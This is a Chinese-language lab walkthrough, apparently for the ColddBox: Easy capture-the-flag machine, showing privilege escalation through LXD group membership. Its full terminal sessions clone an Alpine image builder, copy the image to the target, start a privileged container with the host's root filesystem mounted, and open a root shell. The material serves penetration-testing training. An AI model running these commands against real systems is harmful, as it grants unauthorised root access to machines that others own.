:::info LXC 类似于 Docker ,是 Ubuntu 的容器管理器,如果用户是 LXD 组成员,该组成员可以创建 LXD 容器进行权限提升

    :::

    ColddBox: Easy

    按照此实例进行举例:

    1. c0ldd@ColddBox-Easy:/var/www/html$ id
    2. id
    3. uid=1000(c0ldd) gid=1000(c0ldd) grupos=1000(c0ldd),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

    我们可以从输出中发现用户是 LXD 组成员,我们可以通过传输容器并挂载整个系统来获取权限

    我们从 Github 下载一个容器并传输到目标

    1. ┌──(jtzJTZ)-[~/Desktop/Temp/thm/ColddBox_Easy]
    2. └─$ git clone https://github.com/saghul/lxd-alpine-builder.git
    3. Cloning into 'lxd-alpine-builder'...
    4. remote: Enumerating objects: 50, done.
    5. remote: Counting objects: 100% (8/8), done.
    6. remote: Compressing objects: 100% (6/6), done.
    7. remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
    8. Receiving objects: 100% (50/50), 3.11 MiB | 3.92 MiB/s, done.
    9. Resolving deltas: 100% (15/15), done.
    11. ┌──(jtzJTZ)-[~/Desktop/Temp/thm/ColddBox_Easy]
    12. └─$ cd lxd-alpine-builder/
    14. ┌──(jtzJTZ)-[~/Desktop/Temp/thm/ColddBox_Easy/lxd-alpine-builder]
    15. └─$ ls
    16. alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md
    17. ┌──(jtzJTZ)-[~/Desktop/Temp/thm/ColddBox_Easy/lxd-alpine-builder]
    18. └─$ scp -P 4512 ./alpine-v3.13-x86_64-20210218_0139.tar.gz c0ldd@10.10.6.29:/home/c0ldd/alpine-v3.13-x86_64-20210218_0139.tar.gz
    19. c0ldd@10.10.6.29's password:
    20. alpine-v3.13-x86_64-20210218_0139.tar.gz

    然后我们将系统挂载

    1. c0ldd@ColddBox-Easy:~$ ls
    2. alpine-v3.13-x86_64-20210218_0139.tar.gz  user.txt
    3. c0ldd@ColddBox-Easy:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
    4. Generating a client certificate. This may take a minute...
    5. If this is your first time using LXD, you should also run: sudo lxd init
    6. To start your first container, try: lxc launch ubuntu:16.04
    8. Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
    9. c0ldd@ColddBox-Easy:~$ lxc image list
    10. +---------+--------------+--------+-------------------------------+--------+---------+------------------------------+
    11. |  ALIAS  | FINGERPRINT  | PUBLIC |         DESCRIPCIÓN          |  ARQ   | TAMAÑO |         UPLOAD DATE          |
    12. +---------+--------------+--------+-------------------------------+--------+---------+------------------------------+
    13. | myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB  | Feb 17, 2023 at 8:14am (UTC) |
    14. +---------+--------------+--------+-------------------------------+--------+---------+------------------------------+
    15. c0ldd@ColddBox-Easy:~$ lxc init myimage ignite -c security.privileged=true
    16. Creando ignite
    17. c0ldd@ColddBox-Easy:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
    18. Device mydevice added to ignite
    19. c0ldd@ColddBox-Easy:~$ lxc start ignite
    20. c0ldd@ColddBox-Easy:~$ lxc exec ignite /bin/sh
    21. ~ # id
    22. uid=0(root) gid=0(root)
    23. ~ #